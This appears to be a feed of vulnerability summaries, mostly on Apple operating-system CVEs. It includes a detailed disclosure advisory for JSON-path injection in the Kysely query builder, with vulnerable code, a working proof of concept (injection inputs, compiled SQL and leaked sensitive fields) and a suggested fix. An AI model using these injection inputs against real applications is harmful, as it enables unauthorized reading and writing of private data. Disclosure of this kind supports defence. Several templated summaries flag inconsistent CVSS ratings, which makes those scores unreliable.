Buffer overflow in Apple's image processing framework across iOS, iPadOS, macOS, tvOS, and watchOS allows remote attackers to cause denial of service through process memory corruption. Despite the CVSS 7.5 (High) rating and network attack vector, the vulnerability is rated low priority with only 2% EPSS exploitation probability (5th percentile), indicating minimal real-world threat activity. Apple has released patches in version 26.5 across all affected platforms. No active exploitation or public proof-of-concept has been identified at time of analysis.
WebKit memory corruption vulnerability allows remote attackers to trigger denial-of-service process crashes across Apple's entire operating system ecosystem (iOS, iPadOS, macOS, tvOS, watchOS) when processing maliciously crafted web content. Despite a CVSS score of 7.5 suggesting high confidentiality impact, the vendor description indicates only process crash (availability impact), representing a scoring discrepancy that requires clarification. No active exploitation confirmed (not in CISA KEV), EPSS score of 0.02% (5th percentile) indicates low observed exploitation probability, and vendor patches released across all affected platforms in version 26.5.
Remote denial of service in Apple WebKit (iOS/iPadOS 26.5, macOS Tahoe 26.5, visionOS 26.5) allows unauthenticated network attackers to crash browser processes via maliciously crafted web content exploiting a memory handling flaw. CVSS 7.5 (High) reflects network-based attack with no authentication required, though impact is limited to availability (process crash). EPSS score of 0.02% (4th percentile) indicates very low observed exploitation probability. SSVC assessment confirms no active exploitation, but marks it as automatable, suggesting potential for future weaponization in drive-by attacks. Apple has released patches across all affected platforms.
Improper log data redaction across Apple's operating systems exposes sensitive kernel state to locally-installed applications. Vulnerable versions include iOS/iPadOS prior to 18.7.9 and 26.5, macOS Sequoia prior to 15.7.7, macOS Sonoma prior to 14.8.7, macOS Tahoe prior to 26.5, tvOS prior to 26.5, and watchOS prior to 26.5. Apple has released patches for all affected platforms addressing the CWE-532 (insertion of sensitive information into log file) weakness. The CVSS vector (AV:N/AC:L/PR:N/UI:N) appears inconsistent with the description of an app-based exploit, suggesting Apple's logging subsystem may be remotely queryable or the vector requires clarification. EPSS score of 0.02% (7th percentile) indicates minimal observed exploitation activity despite the high CVSS rating.
Out-of-bounds read in Apple operating systems allows remote unauthenticated denial-of-service via malicious application. Apple has patched this vulnerability across all affected platforms (iOS/iPadOS, macOS, tvOS, visionOS, watchOS) in version 26.5 releases. Despite CVSS 7.5 HIGH rating, exploitation probability remains low (EPSS 2%, 5th percentile) with no public exploit code identified and no CISA KEV listing. The vulnerability is impact-limited to availability (denial-of-service) with no confidentiality or integrity compromise, though tags indicate potential information disclosure concerns that warrant verification against vendor advisories.
Apple Mail on iOS, iPadOS, and macOS bypasses Lockdown Mode protections when replying to emails, allowing remote image loading that should be blocked. This information disclosure affects all supported Apple OS versions (iOS/iPadOS 18.x, macOS Sequoia 15.x, Sonoma 14.x, and Tahoe 26.x) prior to security updates released in early 2026. The vulnerability undermines a critical privacy protection for high-risk users, enabling email tracking and potential IP address disclosure despite Lockdown Mode activation. EPSS score of 0.02% suggests minimal automated exploitation likelihood, no public exploit or CISA KEV listing identified, though the attack complexity is rated low (CVSS AC:L).
Use-after-free in WebKit across Apple's entire operating system ecosystem enables remote information disclosure via malicious web content. Affects iOS/iPadOS, macOS Tahoe, tvOS, visionOS, and watchOS versions prior to 26.5. The vulnerability allows network-based unauthenticated attackers to access high-value confidential information through crafted web pages, though the CVE description anomalously mentions process crash (availability impact) while the CVSS vector indicates confidentiality impact only. No public exploit identified at time of analysis. EPSS score of 0.02% (5th percentile) suggests low likelihood of imminent widespread exploitation despite the broad platform impact and network attack vector.
Malicious applications on iOS 26.5, iPadOS 26.5, and visionOS 26.5 can access sensitive user data due to inconsistent user interface state management. The vulnerability stems from UI state handling flaws (CWE-451) that allow apps to bypass expected data access controls. Apple has released patches in iOS/iPadOS 26.5 and visionOS 26.5. Despite a CVSS score of 7.5 (High), the EPSS score of 0.02% (5th percentile) indicates minimal observed exploitation probability in the wild. No public exploit code or CISA KEV listing identified at time of analysis, suggesting this is primarily a platform-hardening fix rather than an actively targeted vulnerability.
Out-of-bounds write in Apple operating systems allows network-based unauthenticated attackers to corrupt kernel memory or cause denial of service without user interaction. The vulnerability affects iOS, iPadOS, macOS, tvOS, visionOS, and watchOS across multiple versions. Apple has released patches for all affected platforms, though the extremely low EPSS score (0.02%) suggests real-world exploitation risk is minimal despite the network attack vector.
Local attackers can modify Apple Keychain state across iOS, iPadOS, macOS, tvOS, visionOS, and watchOS due to improper input validation (CWE-20). This affects all Apple operating systems prior to their respective April 2026 security updates. Despite a CVSS score of 7.5, exploitation requires local access with specific privileges (description states 'local attacker'), contradicting the CVSS vector's AV:N/PR:N rating. EPSS score of 0.02% (7th percentile) indicates very low observed exploitation probability. No public exploit identified at time of analysis and not listed in CISA KEV. Vendor-released patches available across all platforms as of April 2026.
Buffer overflow in macOS kernel allows local applications to terminate the system or write to kernel memory, affecting macOS Sequoia 15.x, Sonoma 14.x, and Tahoe 26.x. Apple has released security updates patching this vulnerability. Despite the CVSS vector indicating network-based attack (AV:N), the description specifies 'an app may be able to' which confirms local application context, indicating a vector/description inconsistency. EPSS score of 0.02% (4th percentile) suggests low probability of mass exploitation, and no active exploitation or public POC identified at time of analysis.
Malicious applications on macOS Sequoia, Sonoma, and Tahoe can bypass user consent prompts to access the Contacts database through a race condition in symbolic link handling. Apple has patched this privacy control bypass in macOS Sequoia 15.7.7, Sonoma 14.8.7, and Tahoe 26.5. Despite a network-based CVSS vector scoring 7.5 (High), the actual attack requires local application execution, indicating likely miscategorization in the metric. EPSS exploitation probability is very low (0.02%, 4th percentile) with no active exploitation or public POC identified at time of analysis.
Lock screen bypass in iOS and iPadOS versions prior to 26.5 allows unauthorized access to restricted content without authentication. Apple's security advisory HT227110 confirms the privacy issue affected lock screen content filtering mechanisms. Despite CVSS 7.5 scoring suggesting network exploitation, the vulnerability requires physical access to a locked device, creating a significant disparity between theoretical severity and practical attack surface. EPSS probability of 0.02% (5th percentile) indicates minimal observed exploitation attempts, and no CISA KEV listing or public exploit code exists at time of analysis.
Out-of-bounds write in Apple's file parsing component across iOS, iPadOS, and macOS enables remote code execution or denial of service via maliciously crafted files with no user interaction required. Exploitation probability is extremely low (EPSS 0.02%, 6th percentile) with no public exploit identified at time of analysis, despite the critical CVSS 7.3 score and network-based attack vector. Vendor patches available for all affected platforms (iOS/iPadOS 18.7.9, 26.5; macOS Sonoma 14.8.7, Sequoia 15.7.7, Tahoe 26.5). The CVSS vector indicating AV:N/PR:N/UI:N suggests automatic exploitation without user interaction, which contradicts the description's 'parsing a file' language - verify whether this requires user action to open/download the file or if background processes parse untrusted files automatically.
Local privilege escalation in macOS allows malicious applications to modify protected filesystem areas despite system integrity protections, enabling persistent compromise of system security. Affects macOS Sequoia (prior to 15.7.7), Sonoma (prior to 14.8.7), and Tahoe (prior to 26.5). Apple fixed the vulnerability by removing the exploitable code component. Despite the CVSS vector indicating a network-based denial-of-service, the description clearly states the actual impact is unauthorized filesystem modification by local applications, suggesting a CVSS scoring inconsistency. EPSS exploitation probability is very low (0.02%, 4th percentile) with no public exploit code or CISA KEV listing identified.
Memory corruption in Apple's image processing subsystem allows remote unauthenticated attackers to read sensitive process memory across all major Apple platforms (iOS, macOS, tvOS, visionOS, watchOS). CVSS 7.5 indicates network-exploitable, no-interaction attack surface, yet EPSS score of 0.02% (7th percentile) suggests low observed exploitation activity. Vendor-released patches available for all affected platforms as of March 2026. No active exploitation confirmed (not in CISA KEV), but the network attack vector and broad platform impact warrant priority patching for Apple ecosystem deployments.
A race condition in Apple operating systems allows unauthenticated remote attackers to cause system-wide denial of service through unexpected system termination. The vulnerability affects iOS/iPadOS, macOS (Sequoia, Sonoma, Tahoe), tvOS, and watchOS across multiple version branches. Apple has released patches for all affected platforms. The CVSS 7.5 score reflects high availability impact with network attack vector and low complexity, though EPSS probability remains very low (0.02%, 7th percentile), suggesting limited real-world exploitation likelihood. No active exploitation confirmed (not listed in CISA KEV), and no public proof-of-concept identified at time of analysis.
Use-after-free memory corruption in Apple operating systems allows high confidentiality impact through unexpected system termination. Affects iOS/iPadOS versions before 18.7.9 and 26.5, macOS Sequoia before 15.7.7, macOS Sonoma before 14.8.7, macOS Tahoe before 26.5, tvOS before 26.5, visionOS before 26.5, and watchOS before 26.5. Vendor-released patches are available across all affected platforms. EPSS score of 0.02% (7th percentile) indicates low observed exploitation probability in the wild, and no public exploit identified at time of analysis. CVSS vector indicates network-reachable attack surface with no authentication required, though the description states only 'an app' can trigger the condition, suggesting conflicting attack vector classification.
Content Security Policy bypass in Apple WebKit allows remote attackers to access sensitive information via maliciously crafted web content. Affects all major Apple platforms (iOS/iPadOS, macOS, tvOS, visionOS, watchOS) prior to their respective 26.5 releases (iOS/iPadOS also fixed in 18.7.9). Vendor-released patches available across all platforms. EPSS score of 0.03% (10th percentile) indicates low observed exploitation probability despite network-accessible attack vector requiring no authentication or user interaction. No public exploit code or CISA KEV listing identified at time of analysis.
Memory corruption in WebKit across Apple's ecosystem enables confidentiality breach via malicious web content without user interaction. Affects iOS/iPadOS versions prior to 18.7.9 and 26.5, macOS Tahoe prior to 26.5, and all Apple operating systems (tvOS, visionOS, watchOS) prior to 26.5. Despite CVSS 7.5 (High), the EPSS score of 0.03% (10th percentile) indicates minimal real-world exploitation likelihood at time of analysis. No active exploitation confirmed (not in CISA KEV), and no public exploit code identified. Apple has released patches across all affected platforms.
Information disclosure in Apple WebKit's web content processing engine allows remote attackers to read sensitive memory contents via maliciously crafted web pages. This buffer overflow vulnerability (CWE-119) affects all major Apple platforms including iOS, iPadOS, macOS, tvOS, visionOS, and watchOS prior to their respective patched versions. The CVSS vector AV:N/AC:L/PR:N/UI:N indicates trivial network-based exploitation requiring no authentication or user interaction, though the impact is limited to confidentiality (C:H/I:N/A:N) rather than the process crash described by Apple. EPSS score of 0.03% (10th percentile) suggests low observed exploitation probability despite the ease of exploitation. No CISA KEV listing or public POC identified at time of analysis. Apple has released patches across all affected platforms.
Apple operating systems prior to version 26.5 allow installed applications to access sensitive user data through an information disclosure vulnerability requiring local access and user interaction. The flaw affects iOS, iPadOS, macOS Tahoe, and visionOS across all versions before 26.5, with an EPSS score of 0.02% indicating low real-world exploitation probability despite the local attack vector and high confidentiality impact.
Information disclosure in macOS allows malicious applications to read unprotected user data through a path handling vulnerability. Affects macOS Sequoia (prior to 15.7.7), Sonoma (prior to 14.8.7), and Tahoe (prior to 26.5). The CVSS vector (AV:N/AC:L/PR:N/UI:N) appears misaligned with the vendor description indicating local app-based exploitation, requiring verification. Despite high CVSS 7.5, EPSS of 0.02% (4th percentile) suggests minimal observed exploitation activity. No public exploit code or CISA KEV listing identified at time of analysis.
Local privilege escalation in macOS Sequoia, Sonoma, and Tahoe allows applications to gain root privileges through a state handling flaw in the operating system. Apple patched this consistency issue in macOS Sequoia 15.7.7, Sonoma 14.8.7, and Tahoe 26.5. Despite the high CVSS score (7.8), EPSS indicates only 0.02% exploitation probability (4th percentile), no public exploit code identified at time of analysis, and no CISA KEV listing, suggesting this is not yet widely exploited but represents a significant risk in multi-user or untrusted application environments.
Information disclosure in Apple WebKit allows remote attackers to extract sensitive user data by serving maliciously crafted web content to Safari or in-app browsers across iOS, iPadOS, macOS, and visionOS. Fixed in iOS/iPadOS 18.7.9, iOS/iPadOS 26.5, macOS Tahoe 26.5, and visionOS 26.5. Despite high CVSS 7.5, EPSS score of 0.02% (5th percentile) indicates minimal observed exploitation attempts in the wild. No CISA KEV listing and no public exploit code identified at time of analysis. Apple characterizes this as an access restriction flaw (CWE-200), suggesting the vulnerability bypasses same-origin policy or other browser security boundaries to leak data cross-domain.
Confidentiality breach in Apple's operating systems (iOS, iPadOS, macOS, tvOS, visionOS, watchOS) allows remote unauthenticated attackers to access high-sensitivity information through improper access control checks. Despite the vendor description indicating denial-of-service impact, the CVSS vector reveals a severe confidentiality compromise (C:H) with network-accessible attack surface requiring no authentication. Apple has patched all affected platforms in coordinated security updates released across six operating systems. EPSS score of 0.02% suggests low observed exploitation probability, and no public exploit code has been identified at time of analysis.
Sandbox escape in macOS logging subsystem allows malicious applications with low privileges to break containment and access system resources beyond sandbox boundaries. The vulnerability stems from improper data redaction in logging mechanisms (CWE-532), affecting macOS Tahoe 26.x, Sequoia 15.x, and Sonoma 14.x prior to their May 2026 updates. Apple has released patches for all affected versions. EPSS score of 0.02% (4th percentile) indicates minimal widespread exploitation likelihood, with no confirmed active exploitation or public POC at time of analysis. CVSS 8.8 HIGH reflects the scope change (S:C) allowing escape from sandboxed context to system-level access with complete confidentiality, integrity, and availability impact.
macOS Gatekeeper can be bypassed using specially crafted disk images, allowing unauthenticated remote attackers to execute untrusted code without security warnings across iOS, iPadOS, and all supported macOS versions. Apple has released patches addressing this authentication bypass in macOS Tahoe 26.5, Sequoia 15.7.7, Sonoma 14.8.7, iOS 18.7.9, and iPadOS 18.7.9. Despite the CVSS 7.5 HIGH rating, EPSS probability remains very low at 0.02% (5th percentile), suggesting limited immediate exploitation risk, though the attack requires no special conditions and could be delivered via common distribution channels like email or web downloads.
Memory corruption in Apple's WebKit web content processing engine causes an unexpected process crash (denial-of-service) across iOS, iPadOS, macOS, tvOS, visionOS, and watchOS when a victim processes attacker-controlled web content. The CVSS vector AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H confirms network-reachable, unauthenticated exploitation limited to availability impact within the affected process - no code execution or data exfiltration is indicated. No public exploit code has been identified at time of analysis, and EPSS scoring at 0.03% (10th percentile) combined with SSVC Exploitation status of 'none' signal low current exploitation pressure.
Buffer overflow in Apple operating systems allows remote attackers to trigger application denial of service without authentication. Affects iOS/iPadOS, macOS (Sequoia, Sonoma, Tahoe), tvOS, visionOS, and watchOS across multiple versions. Vendor-released patches available for all affected platforms. No public exploit identified at time of analysis, with EPSS score of 0.12% (30th percentile) indicating low probability of widespread exploitation attempts. CVSS 7.5 reflects network-accessible unauthenticated attack causing high availability impact but limited to app termination rather than system-wide denial of service.
Local privilege escalation in Apple macOS (Sequoia, Sonoma, and Tahoe branches) allows a malicious application to gain root privileges by exploiting a path validation flaw in directory path handling. The issue, tracked as CVE-2026-28915 and reported by Apple itself, has no public exploit identified at time of analysis and a very low EPSS score (0.02%), but the total technical impact (root) makes it a meaningful endpoint hardening priority.
Safari on Apple platforms crashes when processing maliciously crafted web content due to a use-after-free vulnerability in memory management, resulting in denial of service. Affects iOS and iPadOS below 26.5, macOS Tahoe below 26.5, tvOS below 26.5, visionOS below 26.5, and watchOS below 26.5. Exploitation requires user interaction to visit a malicious webpage but does not allow code execution or information disclosure.
Sandbox escape in macOS Sequoia, Sonoma, and Tahoe allows malicious applications with low privileges to break containment and gain elevated system access. Apple fixed this permissions handling flaw in macOS 15.7.7, 14.8.7, and 26.5 after addressing inadequate sandbox restrictions. No active exploitation confirmed (CISA KEV absent), but the CVSS scope change (S:C) indicates complete sandbox bypass with high impact to confidentiality, integrity, and availability. EPSS score of 0.01% suggests low probability of mass exploitation despite the severity, likely due to the requirement for local app installation and low-privilege authenticated access.
Race condition in Apple operating systems allows local apps to access sensitive user data without authorization. Affects iOS and iPadOS versions below 26.5, macOS Sequoia 15.7.7, Sonoma 14.8.7, Tahoe 26.5, tvOS, visionOS, and watchOS versions below 26.5. Requires local app execution and user interaction. CVSS 5.5 reflects high confidentiality impact but low exploitation likelihood (EPSS 0.02%, 7th percentile).
Kernel memory layout disclosure in Apple iOS, iPadOS, macOS, tvOS, and watchOS allows a malicious application to read sensitive log data that exposes kernel address information, enabling KASLR bypass. The flaw stems from insufficient redaction of kernel pointers written to system logs (CWE-532) and was reported and patched by Apple across its operating system families. No public exploit identified at time of analysis and EPSS probability is very low (0.02%), but the issue is typically chained with memory-corruption bugs to achieve reliable kernel exploitation.
Gatekeeper security checks in macOS Tahoe can be bypassed using maliciously crafted ZIP archives due to a logic flaw in file handling. An attacker can create a weaponized ZIP file that, when extracted or opened by a user, circumvents Gatekeeper validation, potentially allowing execution of untrusted code. The vulnerability requires user interaction (opening or extracting the malicious archive) and is limited to local attack surface. Vendor-released patch: macOS Tahoe 26.5.
Out-of-bounds write in Apple operating systems allows local network attackers to cause denial-of-service via improved bounds checking bypass. Affects iOS/iPadOS (18.7.9+, 26.5+), macOS Sequoia (15.7.7+), Sonoma (14.8.7+), Tahoe (26.5+), tvOS (26.5+), visionOS (26.5+), and watchOS (26.5+). EPSS score of 0.02% indicates very low real-world exploitation probability despite local attack vector.
Web content processing across all major Apple platforms is vulnerable to a memory mismanagement flaw (CWE-119) that causes an unexpected process crash when a user visits or renders attacker-controlled web content. Affected platforms include iOS/iPadOS, macOS Tahoe, tvOS, visionOS, and watchOS - all versions prior to the 26.5 release line. The impact is limited to availability (A:H), with no confidentiality or integrity exposure per the CVSS vector, and no active exploitation is confirmed - EPSS sits at 0.02% (5th percentile) and SSVC rates exploitation as none, making this a moderate-priority patch rather than an emergency response item.
Memory-corruption crash in Apple's WebKit web-content engine lets a malicious website terminate the content-rendering process across iOS/iPadOS, macOS, tvOS, visionOS and watchOS prior to the 26.5 (and 18.7.9) releases. The flaw is triggered simply by viewing attacker-controlled web content, requiring no authentication but one user action (opening a page). There is no public exploit identified at time of analysis and SSVC rates exploitation as none, though the assigned CVSS 8.8 reflects worst-case memory-corruption potential rather than the crash-only behavior Apple documents.
The issue was addressed with improved memory handling. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Processing maliciously crafted web content may lead to an unexpected process crash.
This issue was addressed through improved state management. This issue is fixed in macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.5. An app may be able to access private information.
A race condition was addressed with additional validation. This issue is fixed in macOS Tahoe 26.4. An app may be able to access sensitive user data.
A privacy issue was addressed by removing the vulnerable code. This issue is fixed in iOS 26.5 and iPadOS 26.5. An attacker with physical access may be able to use Visual Intelligence to access sensitive user data during iPhone Mirroring.
An out-of-bounds access issue was addressed with improved bounds checking. This issue is fixed in iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Parsing a maliciously crafted file may lead to an unexpected app termination.
The issue was addressed with improved memory handling. This issue is fixed in macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.5. Processing a maliciously crafted image may corrupt process memory.
A buffer overflow was addressed with improved bounds checking. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, iOS 26.5 and iPadOS 26.5, macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. An app may be able to cause unexpected system termination.
## Summary Kysely 0.28.12 added a `sanitizeStringLiteral()` call inside `DefaultQueryCompiler.visitJSONPathLeg` (commit `0a602bf`, PR #1727) to fix CVE-2026-32763 (`GHSA-wmrf-hv6w-mr66`). The fix only doubles single quotes (`'` → `''`); it does **not** escape JSON-path metacharacters (`.`, `[`, `]`, `*`, `**`, `?`). When attacker-controlled input flows into `eb.ref(col, '->$').key(input)` or `.at(input)` - including type-safe code where the JSON column is shaped like `Record<string, T>` so `K extends string` is the inferred type - every dot becomes a path-leg separator, letting an attacker traverse from the intended key into sibling and child fields the developer never meant to expose. The result is read access (and, in update statements, write access) to JSON sub-fields outside the intended scope across MySQL, PostgreSQL `->$`/`->>$`, and SQLite. * Project: Kysely - TypeScript SQL query builder (npm `kysely`); affects MySQL, PostgreSQL `->$`/`->>$`, and SQLite dialects. * Source reviewed: `kysely-org/kysely` @ `master` (`73192e4`, version `0.28.16`). * Deployed artefact validated: `kysely@0.28.16` from npm. * Affected file(s): * `src/query-compiler/default-query-compiler.ts` (lines 1611-1639, 1821-1823) * `src/query-builder/json-path-builder.ts` (lines 93-196) * `src/dialect/mysql/mysql-query-compiler.ts` (overrides `sanitizeStringLiteral` but inherits the same behaviour for path legs - escapes `\` and `'`, nothing else) * CWE: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command, with CWE-915 / CWE-1284 (improper validation of specified quantity in input) flavours for the JSON-path sub-language. * OWASP 2021: A03:2021 - Injection. ## Vulnerable code `src/query-compiler/default-query-compiler.ts:1625-1639`: ```ts protected override visitJSONPathLeg(node: JSONPathLegNode): void { const isArrayLocation = node.type === 'ArrayLocation' this.append(isArrayLocation ? '[' : '.') // (1) this.append( typeof node.value === 'string' ? this.sanitizeStringLiteral(node.value) // (2) : String(node.value), ) if (isArrayLocation) { this.append(']') } } ``` `src/query-compiler/default-query-compiler.ts:1821-1823`: ```ts protected sanitizeStringLiteral(value: string): string { return value.replace(LIT_WRAP_REGEX, "''") // (3) } ``` with `LIT_WRAP_REGEX = /'/g`. `src/query-builder/json-path-builder.ts:151-167`: ```ts key< K extends any[] extends O ? never : O extends object ? keyof NonNullable<O> & string : never, O2 = undefined extends O ? null | NonNullable<NonNullable<O>[K]> : null extends O ? null | NonNullable<NonNullable<O>[K]> : // when the object has non-specific keys, e.g. Record<string, T>, should infer `T | null`! string extends keyof NonNullable<O> ? null | NonNullable<NonNullable<O>[K]> : NonNullable<O>[K], >(key: K): TraversedJSONPathBuilder<S, O2> { return this.#createBuilderWithPathLeg('Member', key) // (4) } ``` `src/query-builder/json-path-builder.ts:169-196`: ```ts #createBuilderWithPathLeg( legType: JSONPathLegType, value: string | number, // (5) ): TraversedJSONPathBuilder<any, any> { // ... return new TraversedJSONPathBuilder( JSONPathNode.cloneWithLeg( this.#node, JSONPathLegNode.create(legType, value), // (6) ), ) } ``` At (1) the compiler emits the path-leg separator - `.` for member access or `[` for array index. At (2) the user-supplied string is run through `sanitizeStringLiteral`, which at (3) only doubles single quotes (`'`). Dots, brackets, asterisks, double-asterisks and question marks - every reserved character of the SQL/JSON path mini-language - pass through unmodified. At (4) `.key(K)` types `K` as `keyof NonNullable<O> & string`. When the JSON column is typed as `Record<string, T>` (a common shape for free-form metadata blobs) the inferred `K` is just `string`, so attacker-controlled input is **type-safe** and does not need a `Kysely<any>` escape hatch - this finding is *broader* than `GHSA-wmrf-hv6w-mr66` (CVE-2026-32763), which only covered the `Kysely<any>` case. At (5)/(6) the runtime accepts any `string | number` regardless of `legType`, so a string sent into `.at(...)` (`'last'`/`'#-N'` per the public type signature) also reaches the same emitter and can carry `]` to break out of the bracket. The fix at `0a602bf` only addressed the single-quote → string-literal escape. The JSON-path metacharacter set was overlooked. `MysqlQueryCompiler.sanitizeStringLiteral` (`src/dialect/mysql/mysql-query-compiler.ts:47-51`) overrides the helper to also escape backslashes - but again, it does nothing for `. [ ] * ** ?`. ## Reproduction (validated locally) Environment: `kysely@0.28.16` + `better-sqlite3@12.x`, Node 22, on macOS. The PoC harness lives in `/Users/admin/joplin_research/kysely-poc/`. ### Step 1 - Compiled-SQL evidence across all three dialects `/Users/admin/joplin_research/kysely-poc/poc.mjs` (no DB, just `.compile()`): ```bash $ node poc.mjs ===== MySQL ===== --- baseline: .key("nick") --- SQL: select `profile`->'$.nick' as `out` from `person` --- INJECTION via .key(ATTACKER) -- "nick.secret_field" --- SQL: select `profile`->'$.nick.secret_field' as `out` from `person` --- INJECTION via .key("*") -- wildcard reaches all keys --- SQL: select `profile`->'$.*' as `out` from `person` --- INJECTION via .at(ATTACKER3) -- bracket escape --- SQL: select `profile`->'$[].secret]' as `out` from `person` ===== PostgreSQL (->$ uses jsonpath, MySQL-like) ===== --- baseline: .key("nick") --- SQL: select "profile"->'$.nick' as "out" from "person" --- INJECTION via .key(ATTACKER) --- SQL: select "profile"->'$.nick.secret_field' as "out" from "person" ===== SQLite ===== --- baseline: .key("nick") --- SQL: select "profile"->>'$.nick' as "value" from "person" --- INJECTION via .key(ATTACKER) --- SQL: select "profile"->>'$.nick.secret_field' as "out" from "person" --- INJECTION via .key("*") --- SQL: select "profile"->>'$.*' as "out" from "person" ``` The compiled SQL clearly shows the dot inside the user-supplied "key" being interpreted by the database as a path separator: `'$.nick'` (one leg) becomes `'$.nick.secret_field'` (two legs). MySQL additionally accepts `*` as a wildcard reaching every member at the current level. ### Step 2 - End-to-end data disclosure on a real database `/Users/admin/joplin_research/kysely-poc/sqlite-runtime.mjs` simulates a typical handler that reads one top-level field of the caller's profile: ```js async function fetchProfileField(userInput) { return db.selectFrom('me') .select(eb => eb.ref('profile', '->>$').key(userInput).as('value')) .where('id', '=', 1) .execute() } ``` The `me.profile` JSON column for user 1 is: ```json { "nick": "alice", "tagline": "hi", "internal": { "ssn": "111-11-1111", "token": "tok_abcdef", "admin": true } } ``` The developer's intent: only top-level keys (`nick`, `tagline`) are ever requested. `internal` is private bookkeeping. ```bash $ node sqlite-runtime.mjs ===== Legitimate request ===== userInput = "nick" compiled SQL: select "profile"->>'$.nick' as "value" from "me" where "id" = ? result: [ { value: 'alice' } ] ===== Injection: dot lets attacker reach nested "internal" object ===== userInput = "internal.ssn" compiled SQL: select "profile"->>'$.internal.ssn' as "value" from "me" where "id" = ? result: [ { value: '111-11-1111' } ] userInput = "internal.token" compiled SQL: select "profile"->>'$.internal.token' as "value" from "me" where "id" = ? result: [ { value: 'tok_abcdef' } ] userInput = "internal.admin" compiled SQL: select "profile"->>'$.internal.admin' as "value" from "me" where "id" = ? result: [ { value: 1 } ] ``` Expected vs. actual: the application invariant was "the user can only read top-level keys of their profile". The output violates that invariant - `internal.ssn`, `internal.token`, and `internal.admin` are returned even though `internal` was never meant to be addressable through this endpoint. The same pattern is exploitable on MySQL (where `*` and `**` wildcards make it strictly worse - a single `*` enumerates every sibling at the current level in one row) and on PostgreSQL when using the `->$`/`->>$` operators (which target MySQL-style JSON-path strings on PG ≥ 17 / via `jsonb_path_query`). ## Impact * **Authorization bypass on JSON sub-fields.** Any kysely-built query whose JSON-path key/index argument is partially or fully attacker-controlled - even in fully type-safe code where the column type is `Record<string, T>` - leaks data the developer believed was scoped behind the explicitly-listed key. SSNs, tokens, admin flags, internal IDs, anything stored as a nested member of the same JSON document is reachable. * **Wildcard reads on MySQL / PostgreSQL `->$`.** `key('*')` compiles to `'$.*'`, returning the array of every value at the current depth in one round-trip. `key('**')` recurses across the whole document. The fix does not strip either token. * **Write access in update statements.** Kysely uses the same path compiler for `update().set(eb => eb.ref(col, '->$').key(input), value)`-style writes (and `jsonb_set` helpers). An attacker who can drive both the path and the value can therefore write into nested fields they should not be able to set - for example flipping an `admin` flag or rewriting a nested role. * **Bypasses the recently-fixed precedent.** The maintainers shipped commit `0a602bf` (PR #1727) specifically to harden this surface. That fix removed the `'` (quote) primitive but left every JSON-path metacharacter alone, so the surface is still open against any caller that *thought* it was now safe. * **Practical bounding.** The attacker needs a code path where a request-derived string lands in `.key(...)` or `.at(...)`. This is a recognised pattern (filter-by-field, dynamic `select` for admin dashboards, Strapi-style JSON-blob columns); it is not a default kysely behaviour but is plausibly common. The vulnerable path is also exercised any time a developer writes `db as Kysely<any>` (covered by the older `GHSA-wmrf-hv6w-mr66` advisory) - but unlike that advisory, the bug here triggers in fully-typed code on `Record<string, T>` columns. ## Suggested fix Treat path legs as a structured emission, not a string-literal escape. The narrowest safe patch is a dedicated `sanitizeJSONPathLeg` that only emits a known-good character set per leg type and rejects everything else, since JSON-path quoting differs by dialect (MySQL allows `"…"`-quoted member names; SQLite is more permissive but still has a grammar; PostgreSQL `jsonpath` is strict). ```ts // src/query-compiler/default-query-compiler.ts const JSON_PATH_MEMBER_OK = /^[A-Za-z_$][A-Za-z0-9_$]*$/ protected override visitJSONPathLeg(node: JSONPathLegNode): void { if (node.type === 'ArrayLocation') { this.append('[') if (typeof node.value === 'number') { this.append(String(node.value | 0)) // int-coerce } else if (node.value === 'last' || /^#-\d+$/.test(node.value)) { this.append(node.value) // documented dialect tokens } else { throw new Error(`invalid JSON array index: ${node.value}`) } this.append(']') return } // Member this.append('.') if (typeof node.value !== 'string' || !JSON_PATH_MEMBER_OK.test(node.value)) { // Per-dialect quoted-member escape would go here; default = reject. throw new Error(`invalid JSON path member: ${JSON.stringify(node.value)}`) } this.append(node.value) } ``` For dialect-specific behaviour (MySQL `"…"`-quoted members, SQLite bracket-quoted), each dialect compiler should override the helper and apply the appropriate quoting + double-the-quote rule, the same way `sanitizeIdentifier` already does. Consider also: parameterise JSON paths whenever the dialect supports it (PostgreSQL `jsonb_path_query($1, $2)`, MySQL `JSON_EXTRACT(?, ?)`), so attacker-controlled keys are bound, not concatenated. Add a regression test to `test/node/src/json-traversal.test.ts` asserting that `eb.ref('c','->$').key('a.b').compile().sql` is **either** rejected, **or** emits MySQL `'$."a.b"'` / SQLite `'$.["a.b"]'` (quoted-member form), and explicitly differs from `key('a').key('b')`. A backstop hardening: tighten the `.at()` runtime to accept only `number | 'last' | '#-${digits}'` (matching the type signature), and tighten `.key()` to only accept strings that match `keyof O` at runtime when `O` is statically known.
memono Notepad 4.2 contains a denial of service vulnerability that allows attackers to crash the application by pasting excessively long character buffers into note fields. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Command injection in aandrew-me tgpt up to version 2.11.1 allows local authenticated attackers to execute arbitrary commands via the helper.Update function in helper.go. The vulnerability requires local file system access and an authenticated user context but results in only limited confidentiality impact. Public exploit code exists, though the vendor has not responded to early disclosure attempts, leaving affected users without an official patch.
Cross-site scripting (XSS) in mistune's HTMLRenderer.heading() allows injection of arbitrary HTML attributes when custom heading_id callbacks return unsanitized heading text. The vulnerability occurs because the id attribute value is concatenated directly into the HTML tag without escaping, enabling attackers who control heading content to break out of the id= attribute and inject event handlers or other malicious attributes. Exploitation requires a caller-supplied heading_id callback that derives IDs from heading text - the most common real-world pattern used by documentation generators like MkDocs, Sphinx, and Jekyll. Publicly available proof-of-concept demonstrates mouse-over triggered JavaScript execution via onmouseover attribute injection.